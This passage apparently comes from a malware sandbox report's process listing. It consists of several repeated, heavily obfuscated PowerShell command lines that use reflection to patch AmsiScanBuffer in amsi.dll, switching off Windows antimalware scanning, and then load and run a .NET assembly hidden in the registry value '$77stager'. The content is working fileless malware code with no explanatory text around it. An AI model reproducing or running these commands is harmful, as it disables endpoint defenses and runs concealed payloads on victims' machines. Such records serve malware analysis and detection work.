qrax,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RcoQamvUyhAVWiAaJ,$lJAUZWQmHhyZMbfcqfhtqf).Invoke($JFKnQDBgFostmqrax,[uint32]8,0x20,[ref]$nsVMiFawSU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gJQwCFvyRpZJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hKavBSJmSUazIT,[Parameter(Position=1)][Type]$rtEANINCGM)$sbxuzPkLWZI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+'g'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+'l'+'i'+[Char](99)+','+'S'+''+[Char](101)+''+[Char](97)+'l'+'e'+''+'d'+''+','+'A'+'n'+'s'+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$sbxuzPkLWZI.DefineConstructor('R'+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+''+'i'+'a'+'l'+''+'N'+'am'+[Char](101)+''+','+'Hi'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$hKavBSJmSUazIT).SetImplementationFlags(''+[Char](82)+'unt'+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+'ed');$sbxuzPkLWZI.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+'irtu'+[Char](97)+''+'l'+'',$rtEANINCGM,$hKavBSJmSUazIT).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $sbxuzPkLWZI.CreateType();}$eOuhCWYSNzPbs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'ro'+[Char](115)+'o'+'f'+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'eNat'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'etho'+[Char](100)+''+[Char](115)+'');$QnjOPprFThjqny=$eOuhCWYSNzPbs.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OmuBAiUWFEWFlpGASdu=gJQwCFvyRpZJ @([String])([IntPtr]);$wxtFCBdAGWXNbGijxqrAuM=gJQwCFvyRpZJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YYEACQfzAIY=$eOuhCWYSNzPbs.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+'l'+''+[Char](108)+'')));$wWhpisIiTHSqSY=$QnjOPprFThjqny.Invoke($Null,@([Object]$YYEACQfzAIY,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$tGqrJzxvekxhnWLqM=$QnjOPprFThjqny.Invoke($Null,@([Object]$YYEACQfzAIY,[Object](''+'V'+''+[Char](105)+'r'+'t'+''+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$wYmSzfe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wWhpisIiTHSqSY,$OmuBAiUWFEWFlpGASdu).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$BRrfFeUnHNWmaqdXZ=$QnjOPprFThjqny.Invoke($Null,@([Object]$wYmSzfe,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'can'+'B'+''+[Char](117)+''+[Char](102)+'fe'+'r'+'')));$GqUaKjroLI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tGqrJzxvekxhnWLqM,$wxtFCBdAGWXNbGijxqrAuM).Invoke($BRrfFeUnHNWmaqdXZ,[uint32]8,4,[ref]$GqUaKjroLI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BRrfFeUnHNWmaqdXZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tGqrJzxvekxhnWLqM,$wxtFCBdAGWXNbGijxqrAuM).Invoke($BRrfFeUnHNWmaqdXZ,[uint32]8,0x20,[ref]$GqUaKjroLI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nXtCcmqZaELW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VZxBElydnOgBBC,[Parameter(Position=1)][Type]$VcADVhKcTy)$wXcZAlzHtkQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'Ty'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s,'+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$wXcZAlzHtkQ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+'Si'+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$VZxBElydnOgBBC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'im'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$wXcZAlzHtkQ.DefineMethod(''+'I'+'n'+'v'+'ok'+[Char](101)+'','P'+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+'g,'+[Char](78)+'ew'+[Char](83)+''+[Char](108)+''+[Char](111)+'t,'+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$VcADVhKcTy,$VZxBElydnOgBBC).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $wXcZAlzHtkQ.CreateType();}$VcmsgZfHdGqBo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'em.'+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+[Char](105)+'c'+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+'n'+''+'s'+'a'+'f'+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+'M'+'e'+'t'+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$LZdUcpCPtLzFLS=$VcmsgZfHdGqBo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'S'+'t'+''+'a'+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$egiRRIbQprzxXfKOQiE=nXtCcmqZaELW @([String])([IntPtr]);$vdWLZFamiGyPXUfVYwGtin=nXtCcmqZaELW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KufrZipKnIB=$VcmsgZfHdGqBo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$oHiRIKTbvKOhgq=$LZdUcpCPtLzFLS.Invoke($Null,@([Object]$KufrZipKnIB,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$aQkSxeZJWQKZHeffK=$LZdUcpCPtLzFLS.Invoke($Null,@([Object]$KufrZipKnIB,[Object]('Vi'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+'c'+[Char](116)+'')));$GvXJaVc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oHiRIKTbvKOhgq,$egiRRIbQprzxXfKOQiE).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$GJQhwIHVfcuyRwiYb=$LZdUcpCPtLzFLS.Invoke($Null,@([Object]$GvXJaVc,[Object]('AmsiS'+[Char](99)+''+[Char](97)+'n'+'B'+'u'+[Char](102)+'f'+[Char](101)+'r')));$iqzUsDCjvs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aQkSxeZJWQKZHeffK,$vdWLZFamiGyPXUfVYwGtin).Invoke($GJQhwIHVfcuyRwiYb,[uint32]8,4,[ref]$iqzUsDCjvs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GJQhwIHVfcuyRwiYb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aQkSxeZJWQKZHeffK,$vdWLZFamiGyPXUfVYwGtin).Invoke($GJQhwIHVfcuyRwiYb,[uint32]8,0x20,[ref]$iqzUsDCjvs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cCLxVqshCwYh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HlACfDxTKvvDzj,[Parameter(Position=1)][Type]$vUQrTpDiWW)$lYmFqWkiPVB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+'y'+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType('M'+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+'e'+'T'+[Char](121)+'pe',''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+',Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+[Char](100)+','+[Char](65)+'ns'+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+'to'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$lYmFqWkiPVB.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+'B'+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HlACfDxTKvvDzj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$lYmFqWkiPVB.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+[Char](66)+'yS'+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+'l'+'',$vUQrTpDiWW,$HlACfDxTKvvDzj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $lYmFqWkiPVB.CreateType();}$cLbnhHMomkkjS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+'e'+'m'+''+[Char](46)+'dll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+'t'+'i'+[Char](118)+'e'+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$aUfKulxNbakSgv=$cLbnhHMomkkjS.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+''+'r'+''+[Char](111)+''+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'li'+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IBsijBwgkuJBMEJijte=cCLxVqshCwYh @([String])([IntPtr]);$BoDPQNTNvVFADRxbCqIwpQ=cCLxVqshCwYh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nglXcfhdLsA=$cLbnhHMomkkjS.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$moTAywpYviaNWJ=$aUfKulxNbakSgv.Invoke($Null,@([Object]$nglXcfhdLsA,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$bqsPevgIHqlGpaxHK=$aUfKulxNbakSgv.Invoke($Null,@([Object]$nglXcfhdLsA,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+'al'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$RiNubDU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($moTAywpYviaNWJ,$IBsijBwgkuJBMEJijte).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+'l'+'l');$XnhcsuVIXuhoukJjQ=$aUfKulxNbakSgv.Invoke($Null,@([Object]$RiNubDU,[Object]('A'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$vPuUdaaWyA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bqsPevgIHqlGpaxHK,$BoDPQNTNvVFADRxbCqIwpQ).Invoke($XnhcsuVIXuhoukJjQ,[uint32]8,4,[ref]$vPuUdaaWyA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XnhcsuVIXuhoukJjQ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bqsPevgIHqlGpaxHK,$BoDPQNTNvVFADRxbCqIwpQ).Invoke($XnhcsuVIXuhoukJjQ,[uint32]8,0x20,[ref]$vPuUdaaWyA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:evGbZetBudra{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ADQxmpsrzJCIFO,[Parameter(Position=1)][Type]$jeSgSlpyFA)$FKWiesCjCSV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'fl'+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+'e'+'g'+'at'+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+'e'+'','C'+'l'+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+'A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+'ass',[MulticastDelegate]);$FKWiesCjCSV.DefineConstructor('R'+'T'+''+'S'+'pe'+[Char](99)+'i'+[Char](97)+''+[Char](108)+'Na'+'m'+''+[Char](101)+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ADQxmpsrzJCIFO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'me,'+[Char](77)+''+[Char](97)+'nag'+[Char](101)+'d');$FKWiesCjCSV.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+'H'+''+'i'+''+[Char](100)+''+'e'+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+'w'+''+[Char](83)+'lo'+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l',$jeSgSlpyFA,$ADQxmpsrzJCIFO).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FKWiesCjCSV.CreateType();}$GIUERPpfuzysO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+'f'+'t'+''+[Char](46)+''+[Char](87)+'in3'+'2'+'.'+[Char](85)+'n'+'s'+''+[Char](97)+''+'f'+'e'+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+'e'+''+[Char](77)+'et'+[Char](104)+''+[Char](111)+'ds');$yVbjIsgFqrBjKg=$GIUERPpfuzysO.GetMethod(''+'G'+'etP'+[Char](114)+''+'o'+'cA'+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PBBNypDxYNmKcYYoVcT=evGbZetBudra @([String])([IntPtr]);$buWVGNXmGWROEKainpzGOS=evGbZetBudra @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$piRyYxKhqbq=$GIUERPpfuzysO.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+'ndl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+'el'+[Char](51)+''+'2'+''+'.'+'dl'+'l'+'')));$jOXYPhMMFQIgBn=$yVbjIsgFqrBjKg.Invoke($Null,@([Object]$piRyYxKhqbq,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$hHzRDGjjeKRAAzhTU=$yVbjIsgFqrBjKg.Invoke($Null,@([Object]$piRyYxKhqbq,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+'o'+'t'+'e'+''+'c'+''+[Char](116)+'')));$VStAJUf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jOXYPhMMFQIgBn,$PBBNypDxYNmKcYYoVcT).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$PnFshgWLvFTPOZOpF=$yVbjIsgFqrBjKg.Invoke($Null,@([Object]$VStAJUf,[Object](''+'A'+''+'m'+'s'+[Char](105)+'S'+'c'+''+[Char](97)+'nB'+'u'+'f'+'f'+'e'+[Char](114)+'')));$WdTUEXXCOc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hHzRDGjjeKRAAzhTU,$buWVGNXmGWROEKainpzGOS).Invoke($PnFshgWLvFTPOZOpF,[uint32]8,4,[ref]$WdTUEXXCOc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PnFshgWLvFTPOZOpF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hHzRDGjjeKRAAzhTU,$buWVGNXmGWROEKainpzGOS).Invoke($PnFshgWLvFTPOZOpF,[uint32]8,0x20,[ref]$WdTUEXXCOc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
